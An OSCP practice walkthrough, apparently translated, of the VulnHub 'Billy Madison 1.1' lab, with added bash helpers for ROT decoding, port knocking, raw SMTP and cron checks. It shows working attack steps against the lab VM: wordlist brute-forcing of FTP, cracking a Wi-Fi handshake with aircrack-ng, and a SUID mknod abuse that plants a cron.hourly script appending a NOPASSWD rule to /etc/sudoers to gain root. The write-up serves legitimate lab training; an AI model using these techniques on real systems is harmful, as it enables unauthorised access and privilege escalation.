This post simply records my OSCP lab practice.
Billy Madison: 1.1 ~ VulnHub
After downloading the VM I switched it to bridged networking and imported it into VMware.
Once Kali and the target were both up, I ran an nmap scan of 192.168.165.0/24
and found the target at 192.168.165.156.
hping3
nmap
First I tried SSH weak passwords, though that got nowhere.
ncat -v 192.168.165.156 23
That returned some information,
including a password, rkfpuzrahngvat, and the decoding method: ROT.
I used a random online decoder (CTF在线工具).
ROT13 yields exschmenuating.
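Decoding this locally is quicker than pasting it into a website. The following is an added example, not code from the original post: rot_n rotates by any amount and rot_all prints all 25 shifts, which is what you want when a hint only says "ROT" without a number. The only input is the banner string from the post.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): ROT-n decoding with tr.
# rot_n handles any shift; rot_all lists every shift so the English word
# stands out when the hint does not say which ROT was used.

UPPER='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
LOWER='abcdefghijklmnopqrstuvwxyz'

# rot_n N STRING -> STRING with every letter shifted forward by N (0..25);
# non-letters pass through unchanged.
rot_n() {
    local k=$(( $1 % 26 )) s=$2
    # Rotated alphabet = tail of the alphabet followed by its head.
    local up="${UPPER:$k}${UPPER:0:$k}" lo="${LOWER:$k}${LOWER:0:$k}"
    printf '%s' "$s" | tr "$UPPER$LOWER" "$up$lo"
}

# rot13 STRING -> ROT13 is its own inverse, so this both encodes and decodes.
rot13() { rot_n 13 "$1"; }

# rot_all STRING -> one line per shift ("NN: text") for eyeballing the plaintext.
rot_all() {
    local n=1
    while [ "$n" -le 25 ]; do
        printf '%02d: %s\n' "$n" "$(rot_n "$n" "$1")"
        n=$(( n + 1 ))
    done
}

# The string from the telnet banner in the post.
rot13 'rkfpuzrahngvat'; echo     # prints exschmenuating
```

rot_all is the one to reach for first on an unknown shift: 25 lines are faster to scan than 25 round trips to a web tool, and nothing leaves your machine.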
I opened 192.168.165.156:69 in the browser, the WordPress site, but it would not load, which was odd.
That did not stop me from running wpscan against it.
It found one user: admin.
Then I opened 192.168.165.156:80.
Nothing useful there; Billy is probably a username on the box.
Ran dirb to see what turns up.
Nothing good in the results; the de, da and similar entries below are just the same page in different languages.
Ports 139 and 445 are Samba.
I found I could connect to the EricsSecretStuff share.
Basic smbclient usage:
get xxxxx ; download a file
put xxxxx ; upload a file
mget * ; download every file in the current directory
tar c test.tar notes/ ; archive everything under the notes directory
I tried uploading a file to the share.
Not allowed, so I tried downloading instead.
The file tells us there is a backdoor.
At this point only port 2525 seemed to be left.
With no ideas left I looked at a writeup from abroad.
It turns out the earlier exschmenuating is a directory.
A new page with a clue: veronica uses part of her name in her filename. That immediately made me think of rockyou.txt. Checking the log I found my IP had been banned, apparently because I had connected to port 23.
cat /usr/share/wordlists/rockyou.txt | grep -i veronica > /home/kali/Desktop/111.txt
grep pulls every rockyou entry containing veronica into a wordlist, and dirb then brute-forces with it.
Found it, downloaded it and opened it in Wireshark.
Six emails in total, all sent to port 2525.
EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: [email protected]
From: [email protected]
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica,
Eric Gordon here.
I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users. Just click here to install it, k?
Thanks. -Eric
.
QUIT
EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!
Eric,
Thanks for your message. I tried to download that file but my antivirus blocked it.
Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the "Spanish Armada" combo.
https://www.youtube.com/watch?v=z5YU7JwVy7s
-VV
.
QUIT
EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!
Veronica,
Thanks that will be perfect. Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."
-Eric
.
QUIT
EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:21 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!
Eric,
Done.
-V
.
QUIT
EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:31 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!
Veronica,
Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that. Thanks!
-Eric
.
QUIT
EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:41 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!
Eric,
I clicked the link and now this computer is acting really weird. The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff. I'm going to send this email to you and then shut the computer down. I have some important files I'm worried about, and Billy's working on his big 12th grade final. I don't want anything to happen to that!
-V
.
QUIT
From the conversation: this eric tricked Veronica into downloading malware, and there is an FTP server that stays off unless someone connects with the "Spanish Armada" combo (???). The account is username "eric" with password "ericdoesntdrinkhisownpee."
I opened https://www.youtube.com/watch?v=z5YU7JwVy7s for some English listening practice.
Roughly: 1066, 1215, Spanish Armada, 1466 67 1469 1514 1981 1986, please do not do that.
Knock those ports from a shell:
for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 192.168.165.156; done
Port 21 then opened and accepted connections. Logging in with the credentials above misbehaved; after a search I found that typing passive (toggling the ftp client's passive mode) makes it work.
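The nmap loop works, but it starts one nmap process per port and gives no feedback on whether the knock succeeded. Below is an added example of the same knock in plain bash, not part of the original post or the box's tooling. It relies on the fact that a knock daemon only needs to see the SYN for each port in order; whether the port answers or refuses does not matter, so a plain connect attempt is enough. wait_for_port then polls the port the sequence is supposed to open. Host and sequence are the ones from the post; nothing else is assumed.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): a port knock in plain bash.
# Every connect below is expected to be refused; the daemon only needs the SYN.

# port_open HOST PORT [TIMEOUT_S] -> exit 0 if a TCP connect succeeds.
port_open() {
    local host=$1 port=$2 t=${3:-1}
    # bash's /dev/tcp pseudo-device performs the connect; timeout bounds it
    # for filtered ports that never answer (no bound if timeout is missing).
    if command -v timeout >/dev/null 2>&1; then
        timeout "$t" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    else
        bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    fi
}

# knock HOST PORT... -> touch each port in order with a short pause between hits.
knock() {
    local host=$1 p
    shift
    for p in "$@"; do
        port_open "$host" "$p" 1 || true   # refused/filtered is the normal case
        sleep 0.3
    done
}

# wait_for_port HOST PORT [TRIES] -> poll once a second until the port answers.
wait_for_port() {
    local host=$1 port=$2 tries=${3:-10} i=0
    while [ "$i" -lt "$tries" ]; do
        port_open "$host" "$port" 1 && return 0
        sleep 1
        i=$(( i + 1 ))
    done
    return 1
}

# Usage against the box: the Spanish Armada years first, then confirm 21 opened.
# knock 192.168.165.156 1466 67 1469 1514 1981 1986 && wait_for_port 192.168.165.156 21
```

If wait_for_port never returns 0, the usual causes are the order or timing of the hits (knock daemons enforce a sequence timeout) or a stale state from an earlier partial knock; rerunning the knock is cheaper than restarting the VM.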
get .notes fetched the file; its contents are below. The other files I could not make sense of.
Ugh, this is frustrating. I managed to make a system account for myself. I also managed to hide Billy's paper where he'll never find it. However, now I can't find it either :-(. To make matters worse, my privesc exploits aren't working. One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working. All I need to do is send an email that includes the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm sure Billy or Veronica know. I didn't see it in Billy's FTP folders, but didn't have time to check Veronica's.

-EG
So we need a Wi-Fi password; it is not in Billy's FTP, so it must be in Veronica's.
The video fills in the blank: "My kid will be a Soccer Player". We have to send an email containing that, which should open a new SSH port.
Since Veronica uses her name as part of the password, brute-force Veronica's FTP account.
After logging in there are two files: eg-01.cap and email-from-billy.eml.
email-from-billy.eml reads:
Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Eric's wifi
Hey VV,
It's your boy Billy here. Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.
I didn't walk away without doing my signature move, though. I left a flaming bag of dog poo on his doorstep. :-)
Kisses,
Billy
Billy and Eric are clearly both real charmers. No Wi-Fi password in here though.
Then I remembered Aircrack-ng.
The .cap file name looks exactly like a captured handshake, so it is worth trying to crack. This is fast, so I fed it rockyou.txt directly:
aircrack-ng eg-01.cap -w /usr/share/wordlists/rockyou.txt
It cracked straight away: ESSID EricGordon, password triscuit*.
Then I tried anonymous login and got the information below; for anonymous login any email address works as the password.
Connect to port 2525 on the target and send an email in the same format as the ones in the capture, with the body changed to
My kid will be a soccer player
The session looks like this:
<- 220 BM ESMTP SubEthaSMTP null
 -> EHLO kali
<- 250-BM
<- 250-8BITMIME
<- 250-AUTH LOGIN
<- 250 Ok
 -> MAIL FROM:
<- 250 Ok
 -> RCPT TO:
<- 250 Ok
 -> DATA
<- 354 End data with .
 -> Date: Thu, 15 Sep 2016 07:57:56 -0400
 -> To: [email protected]
 -> From: [email protected]
 -> Subject: My kid will be a soccer player
 -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
 ->
 -> My kid will be a soccer player
 ->
 -> .
<- 250 Ok
 -> QUIT
<- 221 Bye
=== Connection closed with remote host.
Or, equivalently, in one swaks command:
swaks --to [email protected] --from [email protected] --server 192.168.165.156:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"
Rescanning shows port 1974 is now open, running OpenSSH 7.2p2.
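The swaks transcript above is a plain SMTP dialogue, and when swaks is not on hand the same exchange can be driven from bash. The following is an added example, not code from the original post: build_message assembles the DATA payload (headers, CRLF line endings, dot-stuffing and the terminating "."), smtp_session prints the whole client side of the conversation for inspection or for piping into nc, and smtp_send talks to the server over bash's /dev/tcp, checking each reply code so a rejected step stops the run instead of being ignored. The addresses are placeholders; the post's own were stripped during extraction.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): the trigger mail as a raw SMTP
# session. Only smtp_send touches the network; the rest is text assembly.

# build_message FROM TO SUBJECT BODY -> the DATA payload: headers, blank line,
# body with CRLF line endings and dot-stuffing, then the terminating ".".
build_message() {
    local from=$1 to=$2 subject=$3 body=$4 line
    printf 'Date: %s\r\n' "$(date -R)"
    printf 'To: %s\r\n' "$to"
    printf 'From: %s\r\n' "$from"
    printf 'Subject: %s\r\n' "$subject"
    printf '\r\n'
    printf '%s\n' "$body" | while IFS= read -r line; do
        case $line in .*) line=".$line";; esac   # RFC 5321 4.5.2: double a leading dot
        printf '%s\r\n' "$line"
    done
    printf '.\r\n'
}

# smtp_session HELO FROM TO SUBJECT BODY -> the full client side of the dialogue.
smtp_session() {
    local helo=$1 from=$2 to=$3 subject=$4 body=$5
    printf 'EHLO %s\r\n' "$helo"
    printf 'MAIL FROM:<%s>\r\n' "$from"
    printf 'RCPT TO:<%s>\r\n' "$to"
    printf 'DATA\r\n'
    build_message "$from" "$to" "$subject" "$body"
    printf 'QUIT\r\n'
}

# read_reply FD -> echo the server reply up to its final "NNN " line and
# fail on a 4xx/5xx code so the caller can abort the session.
read_reply() {
    local fd=$1 reply=
    while IFS= read -r reply <&"$fd"; do
        printf '<- %s\n' "${reply%$'\r'}"
        case $reply in [0-9][0-9][0-9]' '*) break;; esac   # "250-" lines continue
    done
    case $reply in [45]*) return 1;; esac
}

# smtp_send HOST PORT HELO FROM TO SUBJECT BODY -> deliver one message.
smtp_send() {
    local host=$1 port=$2 helo=$3 from=$4 to=$5 subject=$6 body=$7 cmd
    exec 3<>"/dev/tcp/$host/$port" || return 1
    read_reply 3 || return 1                       # 220 greeting
    for cmd in "EHLO $helo" "MAIL FROM:<$from>" "RCPT TO:<$to>" DATA; do
        printf '%s\r\n' "$cmd" >&3
        read_reply 3 || return 1                   # 250 ..., then 354 for DATA
    done
    build_message "$from" "$to" "$subject" "$body" >&3
    read_reply 3 || return 1                       # 250 Ok after the final "."
    printf 'QUIT\r\n' >&3
    read_reply 3
    exec 3>&- 3<&-
}

# Usage against the box (addresses are placeholders, not from the post):
# smtp_send 192.168.165.156 2525 kali eric@example.com veronica@example.com \
#   'My kid will be a soccer player' 'My kid will be a soccer player'
```

The reply check matters here: the box's trigger is a content match on the message body, so a mail that was silently rejected at RCPT TO or DATA would leave you rescanning for a port that was never going to open.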
searchsploit turns up only a user-enumeration exploit for that version.
SSH as eric with the Wi-Fi password works; time for privesc.
find / -user root -perm -4000 -ls 2>/dev/null
/usr/local/share/sgml/donpcgd stands out: it takes a source and a destination and, as root, mknod()s the destination with the source's mode and device number, so it can create a file at any path, including under /etc/cron.hourly.
eric@BM:~$ /usr/local/share/sgml/donpcgd /dev/null /etc/test
#### mknod(/etc/testing,21b6,103)
eric@BM:~$ ls -lah /etc/test
crw-rw-rw- 1 root root 1, 3 Sep 15 10:22 /etc/test
eric@BM:~$ touch /tmp/test
eric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
#### mknod(/etc/cron.hourly/test,81b4,0)
eric@BM:~$ echo -e '#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
eric@BM:~$ chmod +x /etc/cron.hourly/test
eric@BM:~$ cat /etc/cron.hourly/test
#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
Then it is a matter of waiting for the hourly cron run (up to an hour) and doing sudo su.
Root obtained.
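An hour is a long time to wait only to find that cron never ran the script. On Debian-derived systems /etc/crontab hands /etc/cron.hourly to run-parts at 17 minutes past each hour, and run-parts silently skips any file whose name contains characters outside [A-Za-z0-9_-] (so test.sh would be ignored) or that is not executable. The following is an added example, not from the original post, that reproduces those two rules so the dropped file can be checked before waiting; the directory and file names in the test are constructed.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): check that a file dropped into
# a cron.hourly-style directory is one run-parts would actually execute.

# cron_job_ok PATH -> 0 if run-parts would run it, else 1 with a reason on stderr.
cron_job_ok() {
    local f=$1 name
    name=${f##*/}
    # run-parts (Debian) only accepts names matching ^[A-Za-z0-9_-]+$
    case $name in
        *[!A-Za-z0-9_-]*) echo "skip: '$name' has characters run-parts rejects" >&2; return 1;;
    esac
    [ -f "$f" ] || { echo "skip: '$f' is not a regular file" >&2; return 1; }
    [ -x "$f" ] || { echo "skip: '$f' is not executable (chmod +x)" >&2; return 1; }
    # Not fatal, but a script without a #! line depends on the caller's shell.
    head -c 2 "$f" | grep -q '^#!' || echo "warn: '$f' has no #! line" >&2
    return 0
}

# list_runnable DIR -> names run-parts would execute, in its (sorted) order.
list_runnable() {
    local d=$1 f
    for f in "$d"/*; do
        [ -e "$f" ] || continue
        cron_job_ok "$f" 2>/dev/null && printf '%s\n' "${f##*/}"
    done | sort
}

# Usage on the box, after dropping the script:
# cron_job_ok /etc/cron.hourly/test && list_runnable /etc/cron.hourly
```

Where run-parts itself is available, run-parts --test /etc/cron.hourly gives the authoritative answer (it lists what would run without running it); the functions above are for reasoning about the rules and for hosts where you would rather not execute anything extra.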
But we still have to find Billy's lost file.
It turned up in /PRIVATE at the filesystem root.
This calls for cewl,
to generate a wordlist from the Wikipedia article.
Without a proxy it cannot fetch the page at all from where I am; proxychains is recommended.
proxychains cewl --depth 0 -w billy-wiki.list https://en.wikipedia.org/wiki/Billy_Madison
With the proxy in place it generated fine.
Cracking the container needs truecrack, which installs directly in Kali.
truecrack -w billy-wiki.list -t BowelMovement
Once the password is out, veracrypt is needed to open it.
For installing it on Kali I recommend the openSUSE Software page's instructions, or just use the commands below.
echo 'deb http://download.opensuse.org/repositories/home:/stevenpusser:/veracrypt/Debian_10/ /' | sudo tee /etc/apt/sources.list.d/home:stevenpusser:veracrypt.list
curl -fsSL https://download.opensuse.org/repositories/home:stevenpusser:veracrypt/Debian_10/Release.key | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/home_stevenpusser_veracrypt.gpg > /dev/null
sudo apt update
sudo apt install veracrypt
You must create a directory first and then mount the container into it; that produces a zip file, which has to be unzipped once more.
mkdir billy
veracrypt -tc BowelMovement billy
After unzipping there are two files.
And that is the end. I have to say it was a lot of fun and broadened my thinking; a really good box, and I learned a lot of commands. The most annoying part was ports 21 and 1974: after rebooting the VM I had to rerun the commands before they would open.